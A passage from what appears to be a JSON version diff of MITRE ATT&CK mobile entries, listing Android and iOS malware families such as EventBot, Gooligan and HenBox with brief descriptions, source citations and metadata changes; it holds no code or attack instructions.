New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:26.050000+00:00\", \"old_value\": \"2025-04-16 21:22:08.432000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-12-10 16:07:40.664000+00:00", + "modified": "2025-04-25 14:40:18.436000+00:00", + "name": "Dvmap", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0420", + "external_id": "S0420" + }, + { + "source_name": "SecureList DVMap June 2017", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Dvmap" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:18.436000+00:00\", \"old_value\": \"2025-04-16 21:22:05.219000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-26 14:55:12.847000+00:00", + "modified": "2025-04-25 14:40:36.402000+00:00", + "name": "EventBot", + "description": "[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android\u2019s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0478", + "external_id": "S0478" + }, + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "EventBot" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:36.402000+00:00\", \"old_value\": \"2025-04-16 21:22:12.346000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-15 15:18:11.971000+00:00", + "modified": "2025-04-25 14:40:30.790000+00:00", + "name": "FakeSpy", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0509", + "external_id": "S0509" + }, + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FakeSpy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ofir Almkias, Cybereason" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:30.790000+00:00\", \"old_value\": \"2025-04-16 21:22:10.213000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-04 15:38:56.070000+00:00", + "modified": "2025-04-25 14:40:48.201000+00:00", + "name": "FlexiSpy", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)\n\n[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0408", + "external_id": "S0408" + }, + { + "source_name": "FortiGuard-FlexiSpy", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf" + }, + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + }, + { + "source_name": "FlexiSpy-Website", + "description": "FlexiSpy. (n.d.). FlexiSpy. Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FlexiSpy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:48.201000+00:00\", \"old_value\": \"2025-04-16 21:22:17.243000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-24 17:55:12.561000+00:00", + "modified": "2025-04-25 14:40:36.033000+00:00", + "name": "GPlayed", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0536", + "external_id": "S0536" + }, + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GPlayed" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:36.033000+00:00\", \"old_value\": \"2025-04-16 21:22:12.191000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-04-08 15:51:24.862000+00:00", + "modified": "2025-04-25 14:40:28.434000+00:00", + "name": "Ginp", + "description": "[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0423", + "external_id": "S0423" + }, + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ginp" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:28.434000+00:00\", \"old_value\": \"2025-04-16 21:22:09.244000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-20 15:44:57.339000+00:00", + "modified": "2025-04-25 14:40:44.740000+00:00", + "name": "Golden Cup", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0535", + "external_id": "S0535" + }, + { + "source_name": "Symantec GoldenCup", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Golden Cup" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:44.740000+00:00\", \"old_value\": \"2025-04-16 21:22:15.703000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-24 22:04:27.667000+00:00", + "modified": "2025-04-25 14:40:15.155000+00:00", + "name": "GoldenEagle", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0551", + "external_id": "S0551" + }, + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GoldenEagle" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:15.155000+00:00\", \"old_value\": \"2025-04-16 21:22:03.977000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-27 17:05:57.712000+00:00", + "modified": "2025-04-25 14:40:37.700000+00:00", + "name": "GolfSpy", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0421", + "external_id": "S0421" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GolfSpy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:37.700000+00:00\", \"old_value\": \"2025-04-16 21:22:12.846000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:43.242000+00:00", + "modified": "2025-04-25 14:40:16.979000+00:00", + "name": "Gooligan", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. (Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0290", + "external_id": "S0290" + }, + { + "source_name": "Gooligan", + "description": "(Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Ghost Push", + "description": "Gooligan has been described as being part of the Ghost Push Android malware family. (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + }, + { + "source_name": "Ludwig-GhostPush", + "description": "Adrian Ludwig. (2016, November 29). The fight against Ghost Push continues. Retrieved December 12, 2016.", + "url": "https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi" + }, + { + "source_name": "Lookout-Gooligan", + "description": "Lookout. (2016, December 1). Ghost Push and Gooligan: One and the same. Retrieved December 12, 2016.", + "url": "https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Gooligan", + "Ghost Push" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:16.979000+00:00\", \"old_value\": \"2025-04-16 21:22:04.607000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-03 20:08:00.241000+00:00", + "modified": "2025-04-25 14:40:47.835000+00:00", + "name": "Gustuff", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0406", + "external_id": "S0406" + }, + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Gustuff" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:47.835000+00:00\", \"old_value\": \"2025-04-16 21:22:16.804000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-17 20:15:22.110000+00:00", + "modified": "2025-04-25 14:40:36.765000+00:00", + "name": "HenBox", + "description": "[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0544", + "external_id": "S0544" + }, + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "HenBox" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:36.765000+00:00\", \"old_value\": \"2025-04-16 21:22:12.500000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6447e3a1-ef4d-44b1-99d5-6b1c4888674f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:40.259000+00:00", + "modified": "2025-04-25 14:40:28.796000+00:00", + "name": "HummingWhale", + "description": "[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0321", + "external_id": "S0321" + }, + { + "source_name": "HummingWhale", + "description": "(Citation: ArsTechnica-HummingWhale)" + }, + { + "source_name": "ArsTechnica-HummingWhale", + "description": "Dan Goodin. (2017, January 23). Virulent Android malware returns, gets >2 million downloads on Google Play. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:28.796000+00:00\", \"old_value\": \"2025-04-16 21:22:09.395000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-02 14:32:31.461000+00:00", + "modified": "2025-04-25 14:40:18.080000+00:00", + "name": "INSOMNIA", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0463", + "external_id": "S0463" + }, + { + "source_name": "Volexity Insomnia", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020.", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "INSOMNIA" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:18.080000+00:00\", \"old_value\": \"2025-04-16 21:22:05.067000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:16.257000+00:00", + "name": "Judy", + "description": "[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0325", + "external_id": "S0325" + }, + { + "source_name": "Judy", + "description": "(Citation: CheckPoint-Judy)" + }, + { + "source_name": "CheckPoint-Judy", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018.", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:16.257000+00:00\", \"old_value\": \"2025-04-16 21:22:04.284000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:43.815000+00:00", + "modified": "2025-04-25 14:40:23.854000+00:00", + "name": "KeyRaider", + "description": "[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. (Citation: Xiao-KeyRaider)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0288", + "external_id": "S0288" + }, + { + "source_name": "KeyRaider", + "description": "(Citation: Xiao-KeyRaider)" + }, + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:23.854000+00:00\", \"old_value\": \"2025-04-16 21:22:07.456000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-15 20:20:58.846000+00:00", + "modified": "2025-04-25 14:40:26.424000+00:00", + "name": "Mandrake", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. [Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.\n\n[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. The malware is 